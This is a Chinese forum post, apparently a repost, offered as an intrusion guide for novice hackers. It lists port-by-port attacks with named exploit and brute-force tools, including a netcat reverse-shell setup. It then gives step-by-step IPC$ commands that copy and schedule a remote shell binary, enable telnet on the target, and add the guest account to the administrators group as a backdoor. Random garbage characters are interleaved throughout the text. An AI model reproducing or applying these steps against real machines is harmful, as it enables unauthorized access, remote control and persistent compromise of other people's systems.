TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
! j. @& p' V" x7 C% w希望对新手入侵有帮助!
# }4 N1 n# |" ? 1. 1433端口入侵
5 f9 _2 Q2 N/ c2 x( M( I scanport.exe 查有1433的机器
6 O& m% L! d3 r2 E SQLScanPass.exe 进行字典暴破(字典是关键)
: ~% h! K: k, V" } 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 n f. U- s/ t" D+ I
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口) L: t( p" q' Q5 ]7 C
(以上反向的,测试成功)4 n m0 }2 \' S2 l& B7 N
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
0 T( ?; M' { Z _) d! |9 x 2. 4899端口入侵
+ l, Q9 \/ ~, D+ g f' r- ?/ r 用4899过滤器.exe,扫描空口令的机器
( D' y2 @$ y+ p. i M/ P: ~) X 3. 3899的入侵$ [* I: s, K8 W. \3 G# x8 G' a6 C
对很早的机器,可以试试3389的溢出(win3389ex.exe)
; P! p: f& V$ L6 b d4 J 对2000的机器,可以试试字典暴破。(tscrack.exe)
3 j) j! {7 Q X 4. 80入侵/ j1 o: l' \$ ^! L
对sp3以前的机器,可以用webdav入侵;
) m# Y$ m/ O, Q 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
% b2 Z" ~2 a) @3 e9 c- W# \0 u 可以利用SQL进行注入。(啊D的注入软件)。4 ?: A0 m% y0 e1 X/ Y
5. serv-u入侵(21端口)
i& F7 f2 a/ V' M9 Y$ E 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)+ [" ^! w/ F n" ^+ Y
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
- K8 X ]# R w$ m. a: v& q0 C! | 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)) Z6 H4 F* B2 p5 [
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码. f O9 N/ B& N1 r$ o# ~7 r
6. 554端口
% \9 C2 ~. k( @" o; {, i 用real554.exe入侵。6 f" {% P# n& d% f: q3 [
7. 6129端口
5 P* y0 o. y+ H4 @- ` 用DameWare6129.exe入侵。
! Z1 O/ @4 e$ q: F8 B 8. 系统漏洞
/ _& k# t( r# e 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
$ T! z$ {/ s! ^9. 3127等端口8 v2 Y; R$ S: m9 S% V+ I/ b t
/ c# `2 p) ^) j
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。/ [( B! r. Q" B
10. 其他入侵
' H9 U, s: N( }" J/ ^- U( n- Q 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。+ ?1 j0 b5 D6 Q3 Q% z2 T
- H5 g5 g0 A5 D: K
经典IPC$入侵
* |% I+ H" y$ _5 w4 T1 O, o9 g6 N2 }2 ~# F8 Z
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"; b1 w y5 M+ X/ H8 v; L5 {8 q
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。$ C a$ d/ C8 t
2. C:\>copy srv.exe $">\\127.0.0.1\admin$
5 W6 m1 J) V# F: R 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。; x) R1 {( \" F. [# M/ l+ w8 u2 O2 U2 S
3. C:\>net time file://127.0.0.1/
! @( ]4 b6 {: s% S! p( ]% d3 E" O! Y 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。1 x- L8 R+ R9 b; a' u
4. C:\>at file://127.0.0.1/ 11:05 srv.exe
M/ A7 I# B- D0 v$ N7 [0 p/ p 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
: M: q, p: p6 c$ q 5. C:\>net time file://127.0.0.1/
& I9 b! Q! D( a 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
! q4 W$ V* I+ k" E 6. C:\>telnet 127.0.0.1 99
3 k$ a' ?4 `! k* S% z. C 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
/ i- m& M' \& a% n* f. J 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了! F) q4 n3 }% c; P: @$ R
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$+ d& {( t+ X I# A: P- u" u( N
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。) t" V$ Z5 b/ l O4 b
8. C:\WINNT\system32>ntlm
2 E9 n0 e" N9 k) \) O# p# R% p 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
4 t8 y. T/ o" `* y# W 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
* C( j) _, s" c4 }1 T% y ?8 b 10. C:\>net user guest /active:yes
7 k3 ^+ e6 |2 \* E1 Q& e) ^1 @ 将对方的Guest用户激活4 e0 T6 i) t' @4 e' K- A
11. C:\>net user guest 12344 s# X6 l8 c. q* m8 U2 G- I
将Guest的密码改为1234,或者你要设定的密码# l' j* ~+ [: ~% J- @
12. C:\>net localgroup administrators guest /add$ o1 j9 A8 Y* d, m! n% y' W
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|